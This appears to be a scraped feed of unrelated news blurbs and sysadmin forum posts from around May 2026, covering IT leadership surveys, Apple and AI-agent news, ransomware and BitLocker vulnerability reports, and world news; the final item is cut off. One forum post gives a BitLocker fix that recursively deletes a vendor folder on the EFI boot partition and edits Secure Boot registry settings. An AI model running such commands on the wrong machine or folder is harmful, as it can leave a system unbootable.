Most organizations today can point to a documented security or incident response plan. On paper, roles are assigned, actions are listed, and escalation paths are defined. Yet data from CIO Analytics shows that this documentation rarely translates into real readiness. Only 24 percent of organizations across Northern Europe practice their plans regularly. Denmark stands out with a higher share at 34 percent, but even here, a significant gap remains between having a plan and being prepared to use it under pressure.
AI is now part of everyday operations in many Danish organizations. Tools are deployed, pilots are running, and usage is widespread. Yet for many CIOs, one question remains unanswered: where is the business value? Denmark’s experience with AI highlights a growing gap between adoption and impact, where organizational choices matter more than technology itself.
"We have an ethical obligation to use technology because we know how much of a difference it can make," says Mikkel Solgaard Bojsen-Møller, Finance and Digitalization Director at Gentofte Municipality. Here, digitalization does not begin with the technology – but with the people it is intended to make a difference for: the citizens and the employees.
This report emphasizes the role of IT leadership as an active practice, where IT decision-makers are encouraged to function as strategic partners to businesses rather than merely serving as technical administrators.
CIO Analytics is an annual, data-driven survey designed to capture the priorities, challenges, and strategic direction of today’s IT decision-makers. First launched in Sweden in 2018, the survey has evolved into one of the most comprehensive studies of IT leadership in Northern Europe.
Public cloud is no longer evaluated solely on technical capability in Denmark. It is increasingly assessed through lenses of geopolitics, compliance, and political accountability. This shift marks a move from expansion to scrutiny, where cloud decisions signal governance maturity rather than technological ambition.
In Denmark, IT investment is not only a budget decision. It reflects confidence. The data shows that organizations increasing IT spend are more likely to view their IT organization as proactive. This relationship reveals a deeper dynamic. Proactivity builds trust. Trust unlocks investment. And investment, in turn, reinforces proactivity.
Sam Altman and Elon Musk are facing off in a high-stakes trial that could alter the future of OpenAI and its most well-known product, ChatGPT. In 2024, Musk filed a lawsuit accusing OpenAI of abandoning its founding mission of developing AI to benefit humanity and shifting focus to boosting profits instead. Elon Musk, his financial […]
Police leave the scene and Brighton beach reopens after the bodies of three women are found.
What would some of the world's largest repositories of malware look like if they were stacked as hard drives, one on top of the other?
Ap Iorwerth said it was not just a change in administration but a change of approach for governing Wales.
It comes as a Unite the Kingdom rally is taking place in central London on the same day as the annual Nakba march.
Sony announced its new flagship high-resolution camera, the A7R VI. The standout feature is its fully stacked full-frame sensor with 66.8 megapixels of resolution and up to 16 stops of dynamic range. That's only an increase of about six megapixels for the VI model, but its stacked architecture means a much faster readout speed for […]
Apple is looking into ways to better support apps that include AI agents and AI coding capabilities in the App Store, reports The Information. Apple is designing a system that would maintain its security and privacy standards while allowing for AI app features, but details on how the system will work are unavailable. Apple started blocking updates for some popular vibe coding apps in March because those apps violated App Store rules that prohibit apps from executing code that alters their own functionality or that of other apps. Vibe coding apps let users build apps and websites with little to no coding experience, using AI agents and natural language prompts. Vibe coding has become popular, and Apple's rules have not been able to keep up. Apps that include AI agents present similar problems for Apple. AI agents can autonomously complete complex actions and make mini apps using tools and capabilities that would not traditionally be supported under Apple's App Store rules. Apple will need to make changes to keep up with the software trends that developers and users want. Apple wants to incorporate AI agents into the App Store while preventing some of the issues that people have run into with rogue AI agents deleting content and causing other problems. As it works to prepare for future AI apps, Apple is also developing its own AI capabilities. Siri is set to get a major overhaul in iOS 27, making it smarter and better able to compete with Claude and ChatGPT. Apple has partnered with Google to use custom Gemini models to power Siri. The Information says Apple has started contacting app developers to integrate app capabilities like booking flights and sending calendar invites into the new version of Siri and Apple Intelligence. Some developers are hesitant to work with Apple to integrate their apps into Siri because they are worried about providing new ways for Apple to collect commissions.
Apple is telling some developers that it does not plan to charge commissions during the early stages of the partnership, but that fees are a possibility in the future. Apple has held talks with Baidu, Alibaba, and Tencent about Siri integration in iOS 27, but the companies do not want to end up paying fees to Apple. Apple also plans to allow users to select from multiple chatbots to use with Siri, instead of limiting people to OpenAI's ChatGPT. AI models from companies like Anthropic or Google could be used for Image Playground and Writing Tools the way ChatGPT can be used today. It is not clear if Apple plans to open up more of iOS to third-party chatbots, but OpenAI has reportedly been disappointed with Apple's limitations. ChatGPT can be used to generate images and text through the iOS integration, but it cannot access user emails or other personal information. Customers are also rarely using the functionality, according to The Information. Apple's new version of Siri is expected to be unveiled at the WWDC keynote on June 8, and the plans that Apple has for agentic AI apps in the App Store could also be discussed at the same time. This article, "Apple Working on Plan to Allow AI Agent Apps on the App Store" first appeared on MacRumors.com.
I have been struggling to set up scanning software on my Windows 11 PC with my MA2600cfx. I have installed the 3.3.0216 TWAIN driver and pointed it at the IP address of the printer. I have tried the Kyocera scanning software without success and tried Paint Shop Pro; this had a little success as it did manage to get an image off the scanner but then goes crazy by seemingly receiving the same image over and over until I kill the process. I have also tried setting things up with WIA without success but ideally would like to use TWAIN across my network. Any advice/experience/suggestions/guidance etc. would be much appreciated. submitted by /u/Baz_8755
An anonymous reader quotes a report from Reuters: LinkedIn planned to inform staff of layoffs on Wednesday, two people familiar with the matter told Reuters, in a widening of technology sector cuts this year. The Microsoft-owned social network plans to cut about 5% of its headcount as it reorganizes teams and focuses personnel on areas where its business is growing [...]. LinkedIn employs more than 17,500 full-time workers globally, its website says. Reuters was unable to determine the teams affected. The cuts come as revenue at LinkedIn, which sells recruiting tools and subscriptions, rose 12% in the just-ended quarter from a year prior, in an acceleration of growth in 2026, according to Microsoft's securities filings. The layoff rationale was not for artificial intelligence to replace jobs at LinkedIn, one of the people told Reuters. The specter of AI-fueled disruption has nonetheless hung over software incumbents and workers generally. Read more of this story at Slashdot.
Instagram is once again cribbing from competitors like Snapchat and BeReal with a new photo-sharing format it calls "Instants," which are ephemeral photos that you can't edit and that you can only share with your close friends or followers that follow you back. Instants are available globally beginning on Wednesday as a feature in the […]
MicroMarketing specializes in expert title selections for books, audio CDs, and DVDs, catering primarily to librarians and libraries. The company is known for its personalized service, ensuring that clients receive timely and efficient support without automated responses. They offer valuable services such as downloadable invoices and MARC records, along with a strong price-value proposition. MicroMarketing's commitment to quality and customer satisfaction has garnered positive testimonials from clients who appreciate their reliable and responsive service.
Pamil Modulsystem specializes in renting flexible modular buildings tailored for various needs, including offices and schools. Established in 1963, the company focuses on providing high-quality, customizable solutions that enhance work and learning environments. They manage the entire process from planning and construction to maintenance, ensuring a seamless experience for their clients. Committed to sustainability, Pamil emphasizes circular building practices by renovating returned modules for future use.
Tricon Infotech delivers efficient, automated solutions and full digital transformations through custom products and enterprise implementations. The company's worldwide clients include leaders in the publishing, educational technology, finance, and legal sectors.
We use Cradlepoints and with their somewhat newish move to requiring a subscription to configure the device you own, in addition to their cost - we're looking at alternatives. We have FortiGate firewalls and I tried their FortiExtender and that product is not great. Someone recommended we try Inseego's Wavemaker FX4200 - which I did and purchased their Inseego Connect Advanced license (required for IPSec VPN configuration) and it's been a terrible experience - their connect GUI is littered with random bugs, no troubleshooting tools & support doesn't exist? Still trying to figure this one out. Our current list of requirements: 5G cellular; less expensive than Cradlepoint (hardware/subscription); centrally managed; supports VPNs. We were looking at Ubiquiti - their Dream Router 5G Max would be cool but there's no central management. Looks like their other gateways + 5G modem are though. Never used their gateways before (only their APs & switches). submitted by /u/P_R_woker
BBC correspondents look at some of the new bills Sir Keir Starmer's government wants to pass.
Fervo Energy's IPO was upsized several times after potential investors asked why the enhanced geothermal startup wasn't raising more money.
The IMF sees signs that the Swedish economy will pick up in 2026, with continued GDP growth and improved purchasing power for households. At the same time, the fund points to an uncertain global environment with wars, energy prices and a vulnerable financial system, while SEB's chief economist Jens Magnusson emphasizes that Sweden's starting position is better than that of many other countries. The segment sets the IMF's warnings against the picture of an economy where households' caution in particular has become the weak point.
A paediatrician at a hospital near Berlin has been charged with sex offences in 130 cases, many of which are said to have taken place at the hospital, prosecutors said on Wednesday. The extent of the offences, which include serious sexual abuse of children and rape, had previously been unknown. The paediatrician has been in pre-trial custody since November, with prosecutors citing a risk of reoffending as a reason for the man’s continued detention. In January, it became known that the doctor was...
How much more expensive will petrol become if Helldén gets to decide – and what is he better at than his colleague Amanda Lind? MP's spokesperson answers the audience's questions directly from his private office, and no question is off limits!
Microsoft has responded to the MacBook Neo by commissioning a study that highlights advantages of some Windows laptops. Market research firm Signal65 evaluated four Windows laptops: Lenovo's IdeaPad Slim 3x, Lenovo's Yoga 7i, HP's OmniBook 5, and HP's OmniBook X Flip. With a starting price of $549.99 on Best Buy's online store in the U.S. at the time of this writing, the IdeaPad Slim 3x is the only laptop in the study that currently rivals the MacBook Neo's starting price of $499 (college students) to $599 (general public). The other three laptops currently start at $749 to $1,029 at Best Buy. Signal65 outlined some of the IdeaPad Slim 3x's advantages over the MacBook Neo:

| Feature | IdeaPad Slim 3x | MacBook Neo |
| --- | --- | --- |
| Display Size | 15.3-inch | 13-inch |
| CPU | Snapdragon X1 with "90% faster" multi-core Cinebench 2026 score | A18 Pro |
| Base RAM | 16GB | 8GB |
| Fingerprint Scanner | Included | Touch ID limited to $699 model |
| Ports | 1× USB-C, 2× USB-A, SD, and HDMI | 2× USB-C only |
| Wi-Fi | Wi-Fi 7 | Wi-Fi 6E |
| Backlit Keyboard | Yes | No |
| Touch Screen | Yes | No |

In addition, the IdeaPad Slim 3x achieved longer battery life (16 hours and 29 minutes) compared to the MacBook Neo (13 hours and 28 minutes) in a Tom's Guide test, with Lenovo able to fit a larger battery inside a 15-inch laptop. The study indicated that the IdeaPad Slim 3x has 512GB of storage, but the $549.99 base model has a 256GB SSD, which matches the MacBook Neo. Through June 30, Microsoft is offering U.S. college students a free one-year Microsoft 365 Premium subscription, a free one-year Xbox Game Pass Ultimate subscription, and a free Xbox controller with the purchase of a qualifying Windows laptop, including the IdeaPad Slim 3x. The bundle has a value of more than $500.

On the other hand, the MacBook Neo has some advantages over the IdeaPad Slim 3x:

| Feature | MacBook Neo | IdeaPad Slim 3x |
| --- | --- | --- |
| Display Resolution | 2,408×1,506 pixels (Retina quality) | 1,920×1,200 pixels |
| Display Brightness | 500 nits | 300 nits |
| Build Material | Fully aluminum enclosure | Mix of aluminum and plastic |
| Webcam | 1080p camera | 720p camera |

Moreover, many reviewers indicated that the MacBook Neo has a superior trackpad and speakers compared to Windows laptops within the same price range. Plus, the MacBook Neo runs macOS instead of Windows, so it benefits from Apple's tight hardware and software integration and features that work across multiple Apple devices. While it is unsurprising that this Microsoft-backed study is focused on promoting Windows laptops, the reality is that the MacBook Neo and the IdeaPad Slim 3x both have pros and cons. More competition in the affordable laptop market is a win overall. This article, "New Study Highlights Advantages of $549 Windows Laptop Over MacBook Neo" first appeared on MacRumors.com.
The variant of hantavirus that has spread on the MV Hondius does not differ from similar virus outbreaks, according to the European disease control agency ECDC. At the same time, more people are expected to fall ill in the coming weeks. "It is a very complex situation," says ECDC head Pamela Rendi-Wagner.
Two children are among those reported dead after seven cars were struck in separate attacks south of Beirut.
Here is a selection of the events in western Sweden on Wednesday, May 13.
Jose Mourinho is set to be appointed Real Madrid's new manager. Spanish football expert Guillem Balague explains why.
Driver recovery can automate what used to be an irritating manual process.
Steelmaker Stegra has agreed with lenders to release unused credit under earlier loan agreements of just over SEK 16 billion, Bloomberg reports. According to information given to the news agency, the company had previously not met certain conditions and milestones required to gain access to the money. In April, the Wallenberg family came in as the largest owner of the struggling company; at that point lenders released close to SEK 10 billion in already agreed loans that had been frozen since the turn of the year.
X’s new History tab combines bookmarks, likes, watched videos, and read articles into a single place, expanding the app’s role as a save-it-for-later tool.
The probe will examine whether the Reform UK leader should have declared the gift from crypto billionaire.
The Nitrogen ransomware group claims to have hacked the company’s systems, stealing 8TB of data, including confidential documents. The post Foxconn Confirms North American Factories Hit by Cyberattack appeared first on SecurityWeek.
"We know what customers need right now."
Noam Bettan was met with a mixture of cheering, boos and chants as he performed in Vienna on Tuesday night.
Nigel Farage, leader of the right-wing populist Reform UK, is being investigated for having received five million pounds without declaring it, British media report.
We are stuck on "We are preparing a mailbox for the user." submitted by /u/min5745
Since Intel Meteor Lake there has been the Intel Silicon Security Engine, which serves as a silicon root-of-trust for secure firmware loading, boot measurements, and similar functionality. The Intel Silicon Security Engine has been built upon with Lunar Lake and Panther Lake and is set to take on more importance with future Intel hardware platforms. We are now seeing a Linux driver arrive for this silicon RoT with the Intel Silicon Security Engine Interface (ISSEI)...
The US president says his first request to Xi would be to "open up" China, while Beijing is expected to press Trump on the status of Taiwan.
A man in his 30s resident in Östersund Municipality is sentenced to two years and three months in prison for raping a child. He is also convicted of assault and unlawful threats, but acquitted of aggravated unlawful threats and aggravated interference in a judicial matter.
The German Sovereign Tech Fund has invested 1.2 million euros ($1.4 million USD) in KDE Plasma technologies to help strengthen the structural reliability and security of the desktop environment's core infrastructure, including Plasma, KDE Linux, and the frameworks underlying its communication services. Longtime Slashdot reader jrepin shares an excerpt from the announcement: For 30 years, KDE has been providing the free and open-source software essential for digital sovereignty in personal, corporate, and public infrastructures: operating systems, desktop environments, document viewers, image and video editors, software development libraries, and much more. KDE's software is competitive, publicly auditable, and freely available. It can be maintained, adapted, and improved in-house or by local software companies. And modifications (along with their source code) can be freely distributed to all users and departments within an organization. KDE will use Sovereign Tech Fund's investment to push its essential software products to the next level, providing every individual, business, and public administration with the opportunity to regain their privacy, security, and control over their digital sovereignty. Slashdot reader Elektroschock also shared a statement from Fiona Krakenburger, Technical Director at the Sovereign Tech Agency. "We have long invested in desktop technologies for a reason: they are the primary way people access and use digital services in everyday life," says Krakenburger. "The desktop holds personal data and mediates nearly every service we depend on, from booking the next medical appointment, to education, to the way we work. We are investing in KDE because it is one of the two major desktop environments used across Linux and plays a key role in how millions of people experience open technology.
Strengthening KDE's testing infrastructure, security architecture, and communication frameworks is how we invest in the resilience and reliability of the core digital infrastructure that modern society depends on." Read more of this story at Slashdot.
The feature lets users share disappearing photos with their Close Friends or mutual followers that can be viewed only once and remain available for 24 hours.
Meta CEO Mark Zuckerberg says its new Incognito Chat is "the first major AI product where there is no log of your conversations stored on servers." Messages in Incognito Chat aren't saved or stored in users' chat history, similar to incognito modes on other AI chatbots, but Meta says its version is different because it […]
Hey HN! We’re Vikram and Evan from Ardent (https://tryardent.com). We're building database sandboxes for you and your coding agents. In the last two years coding agents have gotten dramatically more capable at handling complex engineering tasks. But without access to a realistic sandbox at the DB layer for testing, they ship garbage that can take down production databases. I spent over a year building an AI Data Engineer that failed for this exact reason. Evan spent the last 12 years in data engineering and hit this wall building agents at his last company. Ardent was built to make it possible for coding agents to get near instant access to production-like sandboxes so they can test their work. To do this we write a replication stream out of the target DB, scaling with kafka onto a read replica with copy on write enabled and autoscaling compute (we currently prefer neon as a primary branching engine due to their implementation of these properties). Our replication stream uses logical replication + ddl triggers to enable usage on any hosted postgres DB since most platforms do not allow physical replication which is traditionally used for creating replicas. This provides a few primary benefits: 1. Does not require a platform migration to a DB provider like neon, allowing strong separation of production and development concerns. 2. Minimal impact on the production database while allowing clones to spin up in
AI rollback rates hit 81% at firms with mature guardrails, suggesting enterprises are struggling to manage the systems in production, says Sinch
Q Manivannan, originally from India, is on a student visa which is due to expire at the end of the year.
Trafikverket's warning: roe deer on the road on the E20. Alingsås Tidning
Having a bunch of user accounts being locked out throughout this morning after Patch Tuesday. Anyone seeing any similar issues? Event ID: 4740. Weird thing is that there isn't anything listed for Caller Computer Name. submitted by /u/SluggoManiac
The Princess of Wales travels to Reggio Emilia, to learn about its approach to early years education.
England director of cricket Rob Key said Ollie Robinson is "one of the best bowlers in the world" after ending the Sussex seamer's two-year international exile.
The ship, which set sail from Belfast on Friday, is at port in Bordeaux after 49 people fell ill from gastrointestinal illness.
In Ukraine, at least six people have been killed and dozens injured in Russian attacks, says Volodymyr Zelensky. Children are said to be among the dead. Since midnight, Russia has launched at least 800 drones, the president says in a post on X. It is one of the most massive attacks since the start of the full-scale invasion, according to Zelensky. He adds that Russia deliberately attacked regions near the borders of NATO countries.
Valdo Calocane's brother, Elias, told a public inquiry he felt "powerless" when it came to his illness.
First, I admit this is tangentially a sys admin issue. But today, after a lot of iPhone users updated their work phones to the latest iOS, Teams seems to be making itself the default app for FaceTime and cell calls, which if they aren't licensed for Teams VoIP just shits the bed. We've tested on a phone going into several default locations to change the defaults back to FaceTime/cell, but even after these changes, when clicking on a contact and selecting FaceTime, some contacts still use Teams. Uninstalling Teams seems to resolve the issue, but isn't a functional option. Anyone else dealing with this, or resolved it at scale? submitted by /u/ExceptionEX
Six people have been killed after Zelensky warned of "more waves" of Russian strikes through Wednesday.
A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]
Physicist warns proposed Stratos campus could seriously affect local environment
Mind Robotics, which was first revealed in late 2025, has now raised more than $1 billion to date.
BISO = Business Information Security Officer. I honestly don't know what this person should be doing in this role. He's acting like a glorified but unskilled project manager and passing along raw output CSVs with unsorted data from scanning tools. I just wish I knew what he was supposed to be doing for us. submitted by /u/tfm217
But training on "synthetic stories" that model good AI behavior can help.
"I believe I am an honest and trustworthy business person," Altman testified in federal court.
6 degrees and overcast with rain showers in Alingsås during the evening. Alingsås Tidning
Maybe I'm just punch-drunk in my third week attending Musk v. Altman, but I have become very, very fond of Microsoft during the course of this trial. They don't want to be here any more than I do. Their opening statement was honestly one of the most Microsoft things I've ever seen. More than anything […]
This morning I have had 4 different users report an identical issue: User goes to log into their domain-joined Windows PC, puts in their normal password, gets an incorrect password error. Restarting the computer leads to the same thing happening. I reset their password for them, give them the temporary, and the same thing happens. Whether I'm putting it in for them or they're typing it themselves, incorrect password each time. So I log into my account, no problems logging in at all. I do nothing, log out, have them attempt again, and now suddenly they can log in with no issue. Never seen this particular issue before, but it's weird that I'm suddenly getting multiple users across different sites having this identical issue today. Extra info: checked the last password change date, and all users had not changed their passwords recently, so it's not like they got reset without them knowing. EDIT: Resetting password not required, just checked with another user. I logged in, logged out, and they could log in just fine. EDIT 2: Running Test-ComputerSecureChannel once I log in returns True. EDIT 3: A tech was addressing this issue with someone, and he didn't even log in, he just had the user put in their username/password under Other User and this worked, even though the cached "last logged in" page didn't work with the same password. submitted by /u/3100gutter
The Norwegian security police warn that Russian intelligence services are actively trying to recruit Ukrainians who have fled to Norway. From the Swedish side, Säpo says that Russia is continuously trying to recruit agents in Sweden as well, but that issuing a similar warning is not currently on the table. According to Gabriel Wernstedt, press spokesperson at Säpo, a recruitment of so-called disposable agents has been seen in Europe in recent years, a phenomenon that is also being followed in Sweden.
Article URL: https://www.haiku-os.org Comments URL: https://news.ycombinator.com/item?id=48124002 Points: 109 # Comments: 50
Origin Lab will serve as a marketplace where AI labs can buy high-quality licensed data, and video-game companies can sell it.
Security pros warn YellowKey claim could make stolen laptops a much bigger problem
Apple has stepped in to warn that EU proposals to force Google to open Android to competing AI services pose serious risks to user privacy, security, and safety. Apple's latest submission to the EU comes (via Reuters) in response to the European Commission's call for feedback on draft measures designed to help Google comply with the Digital Markets Act (DMA). The proposals would allow competing AI services to interact with Android apps to perform actions such as sending emails, ordering food, or sharing photos. Google has already pushed back on the plans, arguing they would undermine key privacy and security safeguards for European users. Apple, which is itself now subject to EU measures requiring it to open up its own ecosystem, said it has a strong interest in the case given its own operating systems for iPhone, iPad, and Mac. In its submission, Apple said the draft measures "raise urgent and serious concerns," warning that if confirmed, "they would create profound risks for user privacy, security, and safety as well as device integrity and performance." Apple also took aim at the rapidly evolving state of AI as a particular source of concern, arguing that risks are "especially acute in the context of rapidly evolving AI systems whose capabilities, behaviours, and threat vectors remain unpredictable." The company questioned the EU's technical expertise in drawing up the proposals, stating that the Commission is "substituting judgments made by Google's engineers for its own judgment based on less than three months of work," and suggesting the only discernible goal of the draft measures is "open and unfettered access." Apple has a long history of clashing with EU regulators over the DMA. The company challenged the regulation in court in October 2025, and urged regulators to scrap it entirely the month before, arguing it had created security vulnerabilities and worsened the user experience.
The EU said it had no intention of repealing the law in response. The feedback period for the proposals ran from April 27 to May 13, 2026. The European Commission has said it will carefully assess all submissions and may adjust the proposed measures as a result, though its final decision must be adopted within six months of the opening of the specification proceedings, giving a deadline of July 27, 2026. The EU separately concluded in May 2026 that the DMA has had a positive impact overall, setting aside Apple's lobbying for the regulation to be revised. This article, "Apple Defends Google Against EU Proposal to Give AI Rivals Access to Services" first appeared on MacRumors.com.
The trial of the Foxtrot network's Poya Shafie, who is identified as one of gang leader Rawa Majid's closest associates, began today. During the day, prosecutors sought to show links between the defendant and the Foxtrot network, among other things by showing pictures of him wearing fox rings, which have become a symbol of the network, and pictures of him together with the leader. Poya Shafie is suspected of several serious violent crimes, including preparation of and conspiracy to commit the murder of a person linked to the Dalen network in Sundsvall.
Former wicketkeeper Sarah Taylor named England's fielding coach, making her the first woman to coach an England side in a major sport.
Former Gerdsken standout is a hit at Elfsborg. Alingsås Tidning
Microsoft’s MDASH discovered 16 of the Patch Tuesday vulnerabilities, and Palo Alto used Mythos to find dozens of flaws. The post Microsoft, Palo Alto Networks Find Many Vulnerabilities by Using AI on Their Own Code appeared first on SecurityWeek.
Security leaders discuss the first AI-created zero-day exploit.
For founders and investors, Anthropic's new offering signals that the AI platform wars are expanding downmarket and that the next major battleground for user acquisition isn't the Fortune 500; it's the 36 million small businesses that make up the backbone of the U.S. economy.
Harvard faculty are voting on a proposal (PDF) to curb grade inflation by limiting solid A grades to 20% of students in a class, plus four additional A's per course. Axios reports: Grade inflation is at a tipping point at Harvard. A move to make A grades harder to come by at one of the world's leading universities could influence grading debates at peer institutions. Solid A's account for nearly two-thirds of all undergraduate letter grades. That's up from roughly a quarter 20 years ago. More than 50 members of last year's class graduated with perfect GPAs. [...] Faculty are voting on three separate provisions. Each requires a simple majority to pass. A cap to limit solid-A grades to 20% of enrolled students in a class, plus four additional A's per course. Changes to how internal honors are calculated, moving from traditional grade point average scoring to an average percentile rank. Allowing courses to use new "satisfactory" or "unsatisfactory" marks with a "satisfactory-plus" distinction. A pre-vote faculty poll showed around 60% of the 205 respondents favored the 20-plus-four formula over an alternative. Supporters of the cap argue it's intentionally modest as it places no restrictions on A-minuses. The four-grade buffer is designed to protect small seminars where a higher proportion of students may succeed. [...] If passed, changes would take effect in fall 2027, followed by a mandatory three-year review. Read more of this story at Slashdot.
Washington and Beijing have piled on irritants in advance of this week’s summit between US President Donald Trump and his Chinese counterpart Xi Jinping, suggesting that neither side wants to be seen as a deal killer – even as they try to build potential leverage to bargain away, analysts and former US government officials said. Scott Kennedy, senior adviser with the Centre for Strategic and International Studies (CSIS), said that both sides had been “picking up some chits which they might be...
TLDR; The EFI partition was full from prior HP firmware updates, leaving old BIOS files in \EFI\HP folder which prevented the UEFI update process from completing, which caused BitLocker to fail. In case I can save someone else some time. I had a laptop prompting for the Bitlocker Recovery key on every boot / wake from hibernation. I decrypted the drive thinking I'd just re-encrypt which can sometimes fix this. However, Bitlocker would throw an error about "The system cannot find the file specified" when I tried to encrypt the drive again. The April 2026 Windows update tried to install the 2023-signed boot manager, but the boot manager update failed with 0x80070070 (disk full) and servicing got stuck with UEFICA2023Status = NotStarted. So Secure Boot ended up in a weird state with the 2023 certs in the DB, but still running the 2011 signed boot manager. PCR7 was showing "PCR7 binding not possible". So BitLocker validation failed because Secure Boot was borked and the "file not found" error was BitLocker giving up at that validation step because the missing boot manager update meant it literally couldn't find files it expected to be there.
To fix:
    diskpart
    list disk
    select disk 0 (replace with your disk number)
    list partition
    select partition X (the EFI System partition, usually ~100MB, type "System")
    assign letter=S
    exit
    S:
    cd EFI
    rmdir /s /q HP (or your vendor)
Trigger the boot manager update phase:
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Secureboot" /v AvailableUpdates /t REG_DWORD /d 0x100 /f
Run the scheduled task:
    schtasks /run /tn "\Microsoft\Windows\PI\Secure-Boot-Update"
reboot and check the servicing status at HKLM\SYSTEM\CurrentControlSet\Control\Secureboot\Servicing
Enable BitLocker again
submitted by /u/MediumFIRE
Has anyone in corporate purchasing had Dell unilaterally terminate a PC/laptop supply contract due to pricing being too low? submitted by /u/Ghoghogol
Early galaxy has elements produced by the Universe's first supernovae.
Following last week's disclosure of the Dirty Frag vulnerability for the Linux kernel, which only finished being patched up in mainline on Monday, Fragnesia is now public as a similar local privilege escalation (LPE) vulnerability...
Article URL: https://grantmestrength.github.io/S100/ Comments URL: https://news.ycombinator.com/item?id=48123546 Points: 51 # Comments: 9
Tomorrow's webinar examines why prevention alone is no longer enough against modern cyberattacks. The session explores how organizations combine security, backups, and recovery planning to improve cyber resilience after attacks. [...]
Microsoft has addressed a known issue causing some Windows 11 systems to boot into BitLocker recovery after installing the April 2026 Windows security updates. [...]
A ransomware group has claimed responsibility for hacking the electronics manufacturing giant Foxconn and is attempting to extort the company.
Following last month's coverage of an unofficial Mac port of Notepad++ that the original developer called out for trademark violation, the dispute has now been resolved with a rebrand. The macOS port was previously released by Andrey Letov under the Notepad++ name without authorization. Don Ho created the original Windows code editor in 2003, and had publicly objected to the unofficial app's use of his trademark and the inclusion of his name and biography on its author page. After settling the dispute, the app has subsequently been renamed Nextpad++. The site for Nextpad++ has been thoroughly updated and clearly states that the app is an "open-source and independent community port of Notepad++ to macOS." Elsewhere, Letov's About page describes the project as a Mac port of the Notepad++ GPL codebase, built on Objective-C++, Scintilla, and Cocoa, and shipped as a universal binary for Apple silicon and Intel Macs. The app also has a new icon. Names aside, it seems Daring Fireball's John Gruber is less than charmed by the result, describing the app as feeling "unholy" and suggesting the rapid port could only have been built with AI vibe-coding tools. The site states development began on March 10. Have you tried out Nextpad++ for Mac? Let us know what you think in the comments. This article, "Notepad++ Mac Port Renamed Nextpad++ After Trademark Row" first appeared on MacRumors.com
The court has ordered a new trial over the June 2021 killings of Paul and Maggie Murdaugh.
Following a series of cryptic newspaper ads and Instagram teasers that had watch fans speculating about its next collaboration, Swatch announced a new timepiece collection created with luxury watchmaker Audemars Piguet. Inspired by Swatch's iconic Pop watches from the '80s and Audemars Piguet's Royal Oak timepieces that first debuted in 1972, the new Audemars Piguet […]
Police commandos entered the building where a senator wanted by the International Criminal Court had sought refuge.
Article URL: https://kotaku.com/kickstarter-is-the-latest-platform-seemingly-forced-to-ban-adult-content-by-payment-processors-2000695648 Comments URL: https://news.ycombinator.com/item?id=48123198 Points: 231 # Comments: 178
A 21-year-old man has been remanded in custody in his absence by Uppsala District Court. Among other things, he is suspected of being behind the placing of three thermos bombs in Svartbäcken during the Uppsala Marathon. According to SVT's sources, he belongs to the top tier of the criminal Foxtrot network. He is now the subject of an international manhunt and is one of the highest-priority people on Europol's list of wanted persons.
French prosecutors on Wednesday requested a seven-year prison sentence for former president Nicolas Sarkozy in an appeal trial on charges that he sought Libyan financing for his 2007 election. Sarkozy, France’s right-wing leader from 2007 to 2012, has always denied any wrongdoing but last year became modern France’s first former president to have gone to jail over the case, before he was released after 20 days pending his appeal trial. Prosecutors had also requested seven years in the first...
The Tidö parties are now moving ahead with a proposal to the Council on Legislation to, among other things, restrict independent schools' ability to make value transfers such as distributing profits. Among other things, it involves a ban on value transfers during the first years of a newly started school, when a school changes owner, and in the case of certain operational deficiencies. The proposals are drawing strong criticism both from the independent school sector, which considers that they punish high-quality schools, and from the Social Democrats, who consider the proposal ineffective and say independent schools will be able to continue taking out profits.
Patch series would bring memory-safe code to Linux's s390 port, with compiler caveats attached
Article URL: https://fortune.com/2026/05/12/lake-tahoe-data-center-49000-residents-power-source/ Comments URL: https://news.ycombinator.com/item?id=48123090 Points: 88 # Comments: 83
A twelve-year-old girl has, despite her denial, been found to have attempted to detonate two hand grenades in Borås last autumn and to have transported them on public transport. Borås District Court established this on Wednesday when it delivered its judgment in an evidentiary action. According to public prosecutor Louise Bremander, there is a suspected instigator who is said to have directed the girl. He has been remanded in custody in his absence and denies the offence. The man is linked to the criminal network Foxtrot and is believed to be abroad.
The bodies of three women have been recovered from the sea off Brighton. Sussex Police said emergency services were called after concerns were raised for the women’s welfare at around 5.45am on Wednesday, and their bodies were pulled from the water near Madeira Drive. Chief Superintendent Adam Hays said the coastguard is completing an “extensive search of the water”, but the force is not searching for anyone else. The officer said CCTV inquiries are being carried out. Following the incident,...
Article URL: https://ossresistance.com/ Comments URL: https://news.ycombinator.com/item?id=48123015 Points: 138 # Comments: 53
REI’s annual Anniversary Sale doesn’t start until March 15th, but that hasn’t stopped Garmin from rolling out discounts on a range of devices — including its InReach Mini satellite communicators. Right now, for instance, you can grab the Mini 2 at Amazon, REI, and Garmin for $249.99 ($150 off) or the Mini 3 for $399.99 ($50 […]
Cross-border train journeys may become easier to book. The EU wants to bring together tickets from different operators and strengthen passengers' protection when something goes wrong with the journey.
US President Donald Trump arrived in China – flanked by his top aides and American tech leaders – on Wednesday night as Beijing rolled out a lavish welcome ceremony at the airport. He was received by Chinese Vice-President Han Zheng at Beijing Capital International Airport. Trump’s entourage includes Jensen Huang, CEO of Nvidia and a last-minute addition to the trip, as well as US Defence Secretary Pete Hegseth, US Secretary of State Marco Rubio, billionaire entrepreneur Elon Musk and Tim Cook...
An anonymous reader quotes a report from Reuters: Meta employees distributed flyers at multiple U.S. offices on Tuesday to protest the company's recent installation of mouse-tracking software on their computers, according to photos of the pamphlets seen by Reuters. The flyers, which appeared in meeting rooms, on vending machines and atop toilet paper dispensers at the Facebook owner's offices, encouraged staffers to sign an online petition against the move. "Don't want to work at the Employee Data Extraction Factory?" they asked, according to the photos seen by Reuters. [...] The pamphlets and the petition both cite the U.S. National Labor Relations Act, saying "workers are legally protected when they choose to organize for the improvement of working conditions." In the UK, a group of Meta employees has started organizing a drive for unionization with United Tech and Allied Workers (UTAW), a branch of the Communication Workers Union. The employees set up a website to recruit members using the URL "Leanin.uk," a reference to former Chief Operating Officer Sheryl Sandberg's best-selling book encouraging women to seek equal footing in the workplace. "Meta's workers are paying the price for management's reckless and expensive bets. While executives chase speculative AI strategies, staff are facing devastating job cuts, draconian surveillance, and the cruel reality of being forced to train the inefficient systems being positioned to replace them," said Eleanor Payne, an organizer with UTAW. "If we're building agents to help people complete everyday tasks using computers, our models need real examples of how people actually use them -- things like mouse movements, clicking buttons, and navigating dropdown menus," said a 